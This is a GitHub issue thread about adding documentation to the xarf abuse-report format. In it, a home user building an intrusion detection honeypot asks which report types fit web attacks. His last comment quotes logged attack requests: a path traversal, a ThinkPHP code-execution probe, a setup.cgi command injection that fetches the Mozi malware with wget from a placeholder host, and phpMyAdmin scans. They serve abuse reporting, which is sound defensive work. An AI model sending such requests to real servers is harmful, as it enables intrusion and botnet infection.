xarf icon indicating copy to clipboard operation
xarf copied to clipboard
verified publisher icon abusix

Create documentation

Open FrederikP opened this issue 4 years ago • 3 comments

Currently xarf is mainly documented via the schema itself and description fields. That's not really comfortable to read. I think the most commonly used resource when using xarf right now are the samples. We should create a detailed documentation clarifying what the fields mean, what is required, etc.

FrederikP avatar Oct 26 '21 14:10 FrederikP

It would indeed be appreciated to have clear documentation in English rather than just in JSON. Besides, apart from readability, "everything you need to know about the protocol" is more than what's on the wire or what can be expressed in JSON (take a look at any random RFC for examples).

(I am considering writing an XARF generator for the intrusion detection system I'm building. Currently, I'm sending the logs of SSH login attacks to Blocklist.de, and have them do the hard work of submitting it as XARF reports, so a lot of thanks to them.)

IByte avatar Feb 25 '22 13:02 IByte

Hi IByte,

just wanted to let you know about news from today: https://abusix.com/resources/blocklists/abusix-to-take-over-the-operation-of-blocklist-de/ since you mentioned blocklist.de in your question.

If you want, please reach out to us directly and we will be happy to work with you and get you into an early adopter stage for the new things we are planning to do with blocklist.de. Thanks!

tknecht avatar Feb 28 '22 17:02 tknecht

Hello Tobias,

Yes, I am interested in seeing new features on blocklist.de to make abuse reporting more convenient.

I should note that I am a home (i.e. not corporate) user, albeit with a computer science degree.

The advantage of being the only legitimate user of my server from an abuse detection point of view is that it greatly simplifies telling the good traffic from the bad.

The intrusion detection software I'm working on focuses mainly on web traffic, essentially turning it into a honeypot for any web application that isn't actually installed (which is most things), and sends reports about it to IP blocklists. It also incorporates the SSH bans database from fail2ban and sends these to blocklist.de.

While I'm on the subject, is there a XARF reporting type for these types of web-based abuse, e.g. directory traversal attempts, remote code execution and/or trying to download shellcode or trying 251 different ways of saying "phpMyAdmin" to see whether it is on the server? A few examples of the things I'd like to report (edited for brevity):

GET ///remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1 GET /index.php?function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1 GET /setup.cgi?cmd=wget+http://some.ip:51486/Mozi.m HTTP/1.0 GET /mysql/sqlmanager/index.php HTTP/1.1 GET /pma2011/index.php HTTP/1.1

To expand on that subject and return to the original topic of this issue, although I found fail2ban's sample implementation of XARF reporting at https://github.com/fail2ban/fail2ban/blob/master/config/action.d/xarf-login-attack.conf rather informative, as I said earlier, both that and the contents of this repository focus largely on syntax and not so much on semantics, or in plain English, what does it actually mean? When are you supposed to use what kind of reporting type, for instance? The schema files currently don't offer a lot more than a repetition of the type name on that subject.

IByte avatar Mar 02 '22 13:03 IByte